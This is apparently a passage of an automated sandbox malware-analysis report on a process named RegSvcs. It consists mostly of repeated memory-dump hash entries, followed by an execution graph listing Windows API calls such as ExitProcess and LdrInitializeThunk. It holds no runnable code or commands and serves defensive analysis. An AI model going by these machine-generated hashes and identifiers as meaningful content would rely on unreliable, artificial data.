                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86E086316086108FC701EB18DC519D6B771EF87200714C58EE8499F257D631ED4FC7A2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 59858c989ffe8238fcc12220139ae0afcbce3b153e833eefc1fb813a1372ef68
                                                                                                                                                                                                  • Instruction ID: 4f6d55563d1c2d5e6c7b8f6fcb99c4a848e2c5cd603240536fec2922839a3080
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59858c989ffe8238fcc12220139ae0afcbce3b153e833eefc1fb813a1372ef68
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E0123A10D2405FD216CE94FD11CD6BBA1DB86A51B14444EF484A7293C5269D17CB72
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a92c1129a82dd23bceea4ff4238993b52ccd1b39b68a2808eb417a43508c641b
                                                                                                                                                                                                  • Instruction ID: ce7861be228c8749b54f151964eab6400eea4c99ba37a4dbd7b5c224d815cbe5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a92c1129a82dd23bceea4ff4238993b52ccd1b39b68a2808eb417a43508c641b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0E0863190A3449FC706CBF4CA4189A7FB0DE8620071405EBD144D7152E9301F149761
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b813f7b7523912098ff9a65a35ca6f7729d4a1a08bc5626df40ddd642a132485
                                                                                                                                                                                                  • Instruction ID: 87a3480e2c190663dda371902d0d4e20dab3216bae43d30207e973c52d95b064
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b813f7b7523912098ff9a65a35ca6f7729d4a1a08bc5626df40ddd642a132485
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67D017722193A05FD706CB10E861892BB61EF86600B48888AE491CB293CA25AC17CBA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3d7516c106e3ec68427c0666b80a9a923423f63f3945a78a8c8b15fc48c18c9f
                                                                                                                                                                                                  • Instruction ID: 53f18f6b1577cba9a11233db44fa003a4eef3c1394fe0f6266541cc38f4389e5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d7516c106e3ec68427c0666b80a9a923423f63f3945a78a8c8b15fc48c18c9f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50E0EC7510C2919FC342CB54E950856BBE5AF86610B18888EE480DB293C625DD16DB72
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9a0795dc6c7c7f98fe73da79d2adedcf90536b717d6348c65ec6aa55c7adb26c
                                                                                                                                                                                                  • Instruction ID: 8a0611a3b9dfc2454b8582137016116d3f141532e4e640094ea520ca6335e932
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a0795dc6c7c7f98fe73da79d2adedcf90536b717d6348c65ec6aa55c7adb26c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95E0EC7610C2909FC702CB94E960856FFA29F8A604B2884CAE5849B253C522DC17D732
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 564cd8dff0bd627208d61efa8c5063f24ab9947c1aa91de93e2d453745d80b62
                                                                                                                                                                                                  • Instruction ID: 093abebbb195f7e2b4f65393a1a67ab67f97abf3cbcd8990683a401e2e4fc0a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 564cd8dff0bd627208d61efa8c5063f24ab9947c1aa91de93e2d453745d80b62
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8D05E341092906FE341DB68E840966BFA5EBC9210F04C84EF84047202CB629C0BC751
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e441ad4cc31010be5098a900334a55aa74fac49aca341ee51d802992effabfcb
                                                                                                                                                                                                  • Instruction ID: 5f6a18f918fd7c9835777f8f139183cfd94df01f974fcf99424d4511c12a0d53
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e441ad4cc31010be5098a900334a55aa74fac49aca341ee51d802992effabfcb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9D05EB614A2419FD305DF44E944C26BBB2EBE9700F05848FF48457356CA23DC16C772
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ac377d768f0b7357f62e78f748e15e1511fcc741df9c0182460ef95579817975
                                                                                                                                                                                                  • Instruction ID: 11abcdd3c22566896d5b0b8de4f9750033ea0e9fd9dfb5f7d30baca573b166b9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac377d768f0b7357f62e78f748e15e1511fcc741df9c0182460ef95579817975
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0D0A77110D2805FC305CB60C861412BF709F8621471DC0CEE484CB393CA26DD03C710
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 18f65b94791e37c0402ab7b68d200ecce46341ce7e1acf16b1d06e35ac9e1823
                                                                                                                                                                                                  • Instruction ID: 1b064229508d729c546771aa64ac27596ee313de4d1930b66724fd501a7efe7e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18f65b94791e37c0402ab7b68d200ecce46341ce7e1acf16b1d06e35ac9e1823
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50D05E701092905BD381DB68E810967BFA5EBDA214F04C89EE89047303CBA29C1AC751
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9f776f71014b6761ddf3ea51eb305d6dacd2f281a26d6eea0a81405db20ba419
                                                                                                                                                                                                  • Instruction ID: ca216478d44a8629dc01eebb4d5bb53b5a1854befc872307fb7574cab1dfac32
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f776f71014b6761ddf3ea51eb305d6dacd2f281a26d6eea0a81405db20ba419
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46D0A7351083809FC240DB44E841957BB71F7C4314F15C80EE89047352C732D817CB51
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 94b72891d7e391cf300190b667c44cf31f5702c90898d337a9056d2c92522d3c
                                                                                                                                                                                                  • Instruction ID: d052a7492e61c29d24d5f33bf03d19306e1e4a2334fc444f845286f2a7c1afce
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94b72891d7e391cf300190b667c44cf31f5702c90898d337a9056d2c92522d3c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5D0C972D0120CEB8B01DFE9894189EBBF9DB89210B5045E69909D7611EA315E109B91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 59148ecb3f1729fde51cd9dbd04ed22df6ff9b53b0a1e49f680c9615aefaa560
                                                                                                                                                                                                  • Instruction ID: 3de54fa7e6629833f877eb363c92743f270e90b57a83edfd841e34fd3601aabb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59148ecb3f1729fde51cd9dbd04ed22df6ff9b53b0a1e49f680c9615aefaa560
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1D012240062405FE7058710CC565D3BB65EA4360035640CBE4408F197CA266D1BC661
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                                  • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1dde53d936b9a944b22a83f1b7c2a4e7ae0c926e502e44fc677501809894891c
                                                                                                                                                                                                  • Instruction ID: 87021df74f0c2010d1aef690799a9e57f7101ae26e9bb029d46001f0e5a4b57b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dde53d936b9a944b22a83f1b7c2a4e7ae0c926e502e44fc677501809894891c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29C04C2014A2905FC646CB20CC55861BF71DB8251931A85CAE4468F1A3CF16DE17D761
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                                  • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a4e9146ac7ff0a0b315f896bb90d1da02f891ac9e45f21e010e4198281e7def5
                                                                                                                                                                                                  • Instruction ID: dfa1600462592a2be13b5db4c92674e29a8f316d7bc1c1e0e9a65b8d758bcb63
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4e9146ac7ff0a0b315f896bb90d1da02f891ac9e45f21e010e4198281e7def5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EC09B65E0E6844FD70342B81C131C42B35FE436087EA15C7C58197257E009180F4319
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b88c3931f8a88b9b270f3dfca7b76d6b384da1df20b51d9be25cb4a4d2bd35f6
                                                                                                                                                                                                  • Instruction ID: 3972f4a80f068f7ea5224b5e7f6a939ede456e6a0156958f751149cfa18001cb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b88c3931f8a88b9b270f3dfca7b76d6b384da1df20b51d9be25cb4a4d2bd35f6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66C012655191801EE382C664E4517056F515785214F0880DA9044CB3C7CA16D403CA04
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f7c3272609980f450e2245fc79b1c7023be3f4dc96fda5f176ded8c98847ec68
                                                                                                                                                                                                  • Instruction ID: 83635c063901c0e54b50baeec6cde9a3c793820084326d65cf63181f82614e0e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7c3272609980f450e2245fc79b1c7023be3f4dc96fda5f176ded8c98847ec68
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88C09B0400F7D15FD30B06209C55B632F549F03145B1901CFF5C04D0D3958C9F198371
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                                                                                                                  • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:1.9%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:10.1%
                                                                                                                                                                                                  Total number of Nodes:69
                                                                                                                                                                                                  Total number of Limit Nodes:5
                                                                                                                                                                                                  execution_graph 13962 408740 13964 40874f 13962->13964 13963 408a02 ExitProcess 13964->13963 13965 408764 GetCurrentProcessId GetCurrentThreadId 13964->13965 13966 4089eb 13964->13966 13967 40878a 13965->13967 13968 40878e SHGetSpecialFolderPathW GetForegroundWindow 13965->13968 13980 440240 13966->13980 13967->13968 13970 408858 13968->13970 13974 43e840 13970->13974 13972 408969 13972->13966 13977 40b5d0 FreeLibrary 13972->13977 13983 441860 13974->13983 13976 43e84a RtlAllocateHeap 13976->13972 13978 40b5ec 13977->13978 13979 40b5f1 FreeLibrary 13978->13979 13979->13966 13985 441840 13980->13985 13982 440245 FreeLibrary 13982->13963 13984 441880 13983->13984 13984->13976 13984->13984 13986 441849 13985->13986 13986->13982 13987 40ae60 13990 40aef0 13987->13990 13988 40af15 13990->13988 13991 440260 13990->13991 13992 4402a5 13991->13992 13993 440286 13991->13993 13994 440278 13991->13994 13995 44029a 13991->13995 13998 4402a0 13991->13998 14000 43e860 13992->14000 13999 44028b RtlReAllocateHeap 13993->13999 13994->13992 13994->13993 13994->13998 13996 43e840 RtlAllocateHeap 13995->13996 13996->13998 13998->13990 13999->13998 14001 43e873 14000->14001 14002 43e892 14000->14002 14003 43e878 RtlFreeHeap 14001->14003 14002->13998 14003->14002 14026 4408d4 14028 4408f0 14026->14028 14027 44097e 14028->14027 14030 4402d0 LdrInitializeThunk 14028->14030 14030->14027 14031 4406f4 14032 44073e 14031->14032 14033 440715 14031->14033 14033->14032 14035 4402d0 LdrInitializeThunk 14033->14035 14035->14032 14004 440f47 14006 440e70 14004->14006 14007 440e7e 14004->14007 14005 440ece 14006->14007 14011 4402d0 LdrInitializeThunk 14006->14011 14007->14005 14010 4402d0 LdrInitializeThunk 14007->14010 14010->14005 14011->14007 14012 4406a2 GetForegroundWindow 14016 4421b0 14012->14016 14014 4406ae GetForegroundWindow 14015 4406bd 14014->14015 14017 4421c6 14016->14017 14017->14014 14041 43aa74 14042 43aa8c 14041->14042 14043 43aaaf GetUserDefaultUILanguage 14042->14043 14044 43aad6 14043->14044 14018 440a0d 14019 440a17 14018->14019 14022 440afe 14019->14022 14025 4402d0 LdrInitializeThunk 14019->14025 14021 440c1e 14022->14021 14024 4402d0 LdrInitializeThunk 14022->14024 14024->14021 14025->14022 14045 440e39 14046 440d73 14045->14046 14047 440e5d 14045->14047 14048 440dae 14046->14048 14050 4402d0 LdrInitializeThunk 14046->14050 14050->14048

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00408764
                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040876E
                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087C0
                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0040884A
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00408A04
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                  • String ID: b/7
                                                                                                                                                                                                  • API String ID: 4063528623-2085417233
                                                                                                                                                                                                  • Opcode ID: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                                                                                                                                                  • Instruction ID: 0d5a416f21ca3bcde6c043f2d710c8a16f1e6c6a059847071c546a7df00bc279
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF71FB73A043154BC318EF79CD8576AF6D6ABC5320F0A863DE5C4A73D1EA7898048B85

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 155 4402d0-440302 LdrInitializeThunk
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
